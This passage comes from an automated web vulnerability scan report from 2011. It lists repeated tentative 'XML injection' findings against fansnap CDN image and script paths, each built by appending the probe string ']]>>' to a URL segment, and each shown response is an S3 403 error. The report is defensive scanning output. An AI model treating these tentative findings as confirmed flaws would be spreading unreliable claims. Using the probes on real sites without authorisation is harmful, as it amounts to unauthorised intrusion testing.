X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5d3477b0cb64c86fdd3380e009333da7229d1b2d28107c7a657b08c3c64622d72438f5ec574b3e51
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6496BC305C6648B7</RequestId><HostId>ZjP1j5WXiV26OZFfZU2aeqMnc9gKHfGSyzOmFfNiIiNSpQaZve
...[SNIP]...

8.15. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4883EF5FBB9FFA16
x-amz-id-2: X4oTirgkvro8XNZhvJxMZhIZ0dyZa+UGwedFjVJCoHpeav0/sF+Gvzs8OLxCi5ZE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3a22a0cf48db25d188a1cf145a865b475641c1cf9fdfdf247bbb76ae39e1cd25dd1844d5213d7416
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4883EF5FBB9FFA16</RequestId><HostId>X4oTirgkvro8XNZhvJxMZhIZ0dyZa+UGwedFjVJCoHpeav0/sF
...[SNIP]...

8.16. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5812A0C13D9CA5E0
x-amz-id-2: NWTrds6K3TJ/14stTtKIx0Yw3vRc6xxKgag2BzN9VbAtZsSJTvSAvCh6vAp2AnPy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
Age: 149
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e4cedb8610a7c537916ace3dea329c72dda9af3bd550077966a5c0d8c0a08717a90744572f9523df
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5812A0C13D9CA5E0</RequestId><HostId>NWTrds6K3TJ/14stTtKIx0Yw3vRc6xxKgag2BzN9VbAtZsSJTv
...[SNIP]...

8.17. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BA86D911F46F4716
x-amz-id-2: uM7o1MqwtNjGBgUuH5aBArq+UOZh6+SQ7SL/0/LncP4bfyU+e3zLnIYILHbxWb/C
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Content-Length: 231
Age: 146
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f6391b120213600d115a77e7b516ff96daafd85dd42dd3dcab3c02c91461f00e5db5f1f277cf3860
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BA86D911F46F4716</RequestId><HostId>uM7o1MqwtNjGBgUuH5aBArq+UOZh6+SQ7SL/0/LncP4bfyU+e3
...[SNIP]...

8.18. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 97A429F94A9FD51A
x-amz-id-2: qR0nBFJ2wPl+JPBirdM+od9ZvSHvphhn8sd5s1iGf0RjMDptHSU0M9PfzUekVSE+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Content-Length: 231
Age: 146
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 969884722028a41b012d3de201a4a6dbbdf632c1c856ca769572c1afd313b55f002377c13ac8bb75
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>97A429F94A9FD51A</RequestId><HostId>qR0nBFJ2wPl+JPBirdM+od9ZvSHvphhn8sd5s1iGf0RjMDptHS
...[SNIP]...

8.19. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4E9E2819F31DCB39
x-amz-id-2: TjzzDdqB7aMnNXELibKZCFpccnF7fRUY2RESMH7gmEvwIslwK7KwvcWbS4pFCsQW
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: AmazonS3
Content-Length: 231
Age: 49
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e1d76a9004904ad7a185cdb8809cd5c43add8e6d6e0bc6e348325a4efeef7d56abbea794f6885aa7
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4E9E2819F31DCB39</RequestId><HostId>TjzzDdqB7aMnNXELibKZCFpccnF7fRUY2RESMH7gmEvwIslwK7
...[SNIP]...

8.20. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/checkout_interstitial.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8966D4E9FF5E403B
x-amz-id-2: 5GE8zcAkl30CPd1rVM3bb40IHXmOThR7j4eCV+e4NHQTInz3j4M1Kvda3zb7TQ1k
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:30 GMT
Server: AmazonS3
Content-Length: 231
Age: 45
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1ab3bac5233e1c8a984e8074543d91f721cd93945579be525a517645ca3f54d9fff511fd8202460b
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8966D4E9FF5E403B</RequestId><HostId>5GE8zcAkl30CPd1rVM3bb40IHXmOThR7j4eCV+e4NHQTInz3j4
...[SNIP]...

8.21. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 819A30940EB51C98
x-amz-id-2: SIUedySiaHk/Mh7l2vDeA+Vm9pa2WXmQNexLlny9Q9bfFx5deyiZ81WqfXnLuKF9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:34 GMT
Server: AmazonS3
Content-Length: 231
Age: 41
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ef86af12eae91607962922e66bd67271e2bb2856524d480aef09e95961dd7894b2f57dd5246fae21
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>819A30940EB51C98</RequestId><HostId>SIUedySiaHk/Mh7l2vDeA+Vm9pa2WXmQNexLlny9Q9bfFx5dey
...[SNIP]...

8.22. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/cancel.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 41D9184ED71E08A9
x-amz-id-2: HnD65mzAS9twyAyBikfpVUenTe7VIoH86jHrtY7t9ZpZWm3VzOZwT+qvrEi9mDAj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Content-Length: 231
Age: 155
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 39cd64f15ac6bc8a38e06cee12812ee3b80fad0809f16db1f842fd5d15a48e27c7fe9084e1c21906
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>41D9184ED71E08A9</RequestId><HostId>HnD65mzAS9twyAyBikfpVUenTe7VIoH86jHrtY7t9ZpZWm3VzO
...[SNIP]...

8.23. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/cancel.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E29750E108656AE1
x-amz-id-2: DTaJ3wj7Wy28Ro62n9sTs63OcgLpzU6trKqC6kcoTjrLVTNEoQvCVG+uf+mljqaa
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
Age: 156
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 350156f8d4be285e757cb82f3c280e6c0e8d60b5c9c5643bebe4664e64ee3942740022d79f4795d7
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E29750E108656AE1</RequestId><HostId>DTaJ3wj7Wy28Ro62n9sTs63OcgLpzU6trKqC6kcoTjrLVTNEoQ
...[SNIP]...

8.24. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/cancel.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4CD105DAD25FB802
x-amz-id-2: vS8Ma4M50MA1q8WYGumrMEa/SsBj/Bkvi7f/Bx0Lne2HiijySVzLSdweB8x+21dl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
Age: 153
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b972b75bae70d8447458073f09cf336763f549599a31fcf651268e522225b3c39e7cc3473bba0806
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4CD105DAD25FB802</RequestId><HostId>vS8Ma4M50MA1q8WYGumrMEa/SsBj/Bkvi7f/Bx0Lne2HiijySV
...[SNIP]...

8.25. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-large-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5169D3ECCE955D7D
x-amz-id-2: Jw4lST1978IvxpZDXx348P0CRJ0NdHiAl5ERgiKuAmcQA5IAzenb5RcAahxs2Z8W
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8a3629974a65ce188658459a047e71f6389867a453fc6dd824ca2888a20d90b0ec57038e168a35df
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5169D3ECCE955D7D</RequestId><HostId>Jw4lST1978IvxpZDXx348P0CRJ0NdHiAl5ERgiKuAmcQA5IAze
...[SNIP]...

8.26. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-large-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2BB157C8B78CD589
x-amz-id-2: iAvVDpnyDCZ4MzEUfrRSYs3FqbeBDd4sGCzDNQKhhnIcJyFXkd3x7Zyr/cBGjbrV
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:31 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: fda3576be53ae9d30cf89cbcc5d11a4331d58553745b69239a318c89a53ca1138ae60b7daa28b283
